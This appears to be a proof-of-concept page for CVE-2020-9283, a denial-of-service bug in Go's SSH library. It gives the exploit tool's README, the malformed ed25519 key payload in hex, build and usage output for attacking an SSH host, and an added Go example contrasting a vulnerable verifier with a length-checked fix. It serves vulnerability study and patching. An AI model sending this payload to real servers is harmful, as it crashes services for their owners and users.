
CVE-2020-9283 PoC — Golang Go crypto data forgery vulnerability

Source
Associated Vulnerability
Title: Golang Go crypto data forgery vulnerability (CVE-2020-9283)
Description: Golang Go crypto is the Go community's cryptography library, written in Go. Versions of the Golang SSH package (golang.org/x/crypto/ssh) before v0.0.0-20200220183623-bac4c82f6975 contain a data forgery (input validation) vulnerability. An attacker can exploit it to cause a denial of service.
Description
Exploit for CVE-2020-9283, written in Go.
Readme
# Exploit for CVE-2020-9283  

This project is inspired by the original PoC found at github.com/mark-adams/exploits/CVE-2020-9283.
I was curious about how the Go SSH library is implemented, so I decided to reimplement the PoC in Go.

A short writeup can be found here https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

# What does this do?

This sends a crafted public-key authentication request to a Go SSH server built on a vulnerable golang.org/x/crypto/ssh. The server panics while verifying the request's signature against an ed25519 public key of the wrong length; a panic that nothing recovers terminates the server process, which is the denial of service.

# Installation

I've released binaries in the Release section however you can rebuild your own using the source code attached.

## Building the sources
I decided to modify the Go crypto library directly on my system to understand how it works. This is not ideal and probably not the best way to do it, but it works ;) If you want to rebuild using Go modules, replace the contents of the crypto/ssh files client_auth.go, handshake.go and transport.go on your local system with the ".bak" files in this repository. These modified files contain verbose debugging output and a hardcoded public key blob, "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161", which triggers the panic. Decoded, the blob is the SSH wire encoding (4-byte big-endian length followed by data) of the string "ssh-ed25519" followed by a 21-byte "key" ("aaa-aaaa-aa-aaa-aaaaa"). A real ed25519 public key is 32 bytes; the vulnerable library accepted the blob without checking the key length and handed it to ed25519 signature verification, which panics on a key of the wrong size.
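The following is an added example, not code from this repository or from golang.org/x/crypto. It reconstructs the payload above from its two SSH wire-format strings, then contrasts a verification routine that passes the parsed key bytes straight to `ed25519.Verify` (the pre-fix behaviour, which panics on a 21-byte key) with one that rejects a wrong-length key before verifying (the fixed behaviour). The function names, the hypothetical message and the constructed key bytes are this example's own; only the hex payload comes from the README.

```go
package main

import (
	"crypto/ed25519"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

// readmePayloadHex is the public key blob hardcoded in the modified library files:
// string "ssh-ed25519" followed by a 21-byte key, where ed25519 needs 32 bytes.
const readmePayloadHex = "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161"

// sshString encodes b as an SSH "string": uint32 big-endian length, then the bytes (RFC 4251 section 5).
func sshString(b []byte) []byte {
	out := make([]byte, 4+len(b))
	binary.BigEndian.PutUint32(out, uint32(len(b)))
	copy(out[4:], b)
	return out
}

// readSSHString pops one SSH string off the front of b, refusing truncated input.
func readSSHString(b []byte) (val, rest []byte, err error) {
	if len(b) < 4 {
		return nil, nil, errors.New("short read: missing length prefix")
	}
	n := binary.BigEndian.Uint32(b)
	if uint64(n) > uint64(len(b)-4) {
		return nil, nil, errors.New("short read: truncated string")
	}
	return b[4 : 4+n], b[4+n:], nil
}

// BuildEd25519Blob builds the key blob a client places in SSH_MSG_USERAUTH_REQUEST:
// string "ssh-ed25519", string keyBytes. No length check is done here on purpose,
// so the README's malformed 21-byte payload can be reproduced.
func BuildEd25519Blob(keyBytes []byte) []byte {
	return append(sshString([]byte("ssh-ed25519")), sshString(keyBytes)...)
}

// parseBlob splits a key blob into its algorithm name and raw key bytes.
func parseBlob(blob []byte) (algo string, key []byte, err error) {
	name, rest, err := readSSHString(blob)
	if err != nil {
		return "", nil, err
	}
	key, rest, err = readSSHString(rest)
	if err != nil {
		return "", nil, err
	}
	if len(rest) != 0 {
		return "", nil, errors.New("trailing data after key blob")
	}
	return string(name), key, nil
}

// VerifyUnchecked mirrors the pre-fix behaviour: the parsed key bytes go straight to
// ed25519.Verify, which panics ("ed25519: bad public key length: ...") when len(key) != 32.
func VerifyUnchecked(blob, message, sig []byte) (bool, error) {
	_, key, err := parseBlob(blob)
	if err != nil {
		return false, err
	}
	return ed25519.Verify(ed25519.PublicKey(key), message, sig), nil
}

// VerifyChecked is the hardened variant: a key of the wrong size is rejected with an
// error before any cryptographic call, so a malformed blob can no longer crash the process.
func VerifyChecked(blob, message, sig []byte) (bool, error) {
	algo, key, err := parseBlob(blob)
	if err != nil {
		return false, err
	}
	if algo != "ssh-ed25519" {
		return false, fmt.Errorf("unexpected key type %q", algo)
	}
	if l := len(key); l != ed25519.PublicKeySize {
		return false, fmt.Errorf("invalid size %d for ed25519 public key", l)
	}
	return ed25519.Verify(ed25519.PublicKey(key), message, sig), nil
}

// DidPanic runs fn and reports whether it panicked, so the DoS condition can be
// observed in-process instead of taking the program down.
func DidPanic(fn func()) (panicked bool, msg string) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
			msg = fmt.Sprint(r)
		}
	}()
	fn()
	return false, ""
}

func main() {
	// Hypothetical signed data; the server would use the session id plus the request fields.
	msg := []byte("signed userauth request")
	blob := BuildEd25519Blob([]byte("aaa-aaaa-aa-aaa-aaaaa")) // constructed to match the README payload
	fmt.Println("matches README payload:", hex.EncodeToString(blob) == readmePayloadHex)

	panicked, why := DidPanic(func() { VerifyUnchecked(blob, msg, make([]byte, ed25519.SignatureSize)) })
	fmt.Println("unchecked verify panicked:", panicked, why)

	ok, err := VerifyChecked(blob, msg, make([]byte, ed25519.SignatureSize))
	fmt.Println("checked verify:", ok, err)
}
```

Run it and the first verify path panics with the same "bad public key length" message the README expects on the target, while the checked path returns an error and carries on. This is the shape of the upstream fix: validate the key length at parse and verify time rather than trusting the peer-supplied blob.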

# Usage
You will see lots of debugging output and "errors"; this is expected. If the target has panicked, you should see an error about a bad key length: on the target, 'panic: ed25519: bad public key length', while on the client side the connection simply drops with an EOF. If you want to test this locally, use the vulnerable server code found at github.com/mark-adams/exploits/CVE-2020-9283.

```
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
[+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

```
File Snapshot

```
[4.0K] /data/pocs/0a3142ae02d3b8a652d8b087e9e865f96738d61b
├── [ 20K] client_auth.go.bak
├── [8.7K] client.go.bak
├── [ 115] go.mod
├── [ 824] go.sum
├── [ 16K] handshake.go.bak
├── [1.7K] main.go
├── [1.5K] Makefile
├── [2.0K] README.md
└── [9.3K] transport.go.bak

0 directories, 9 files
```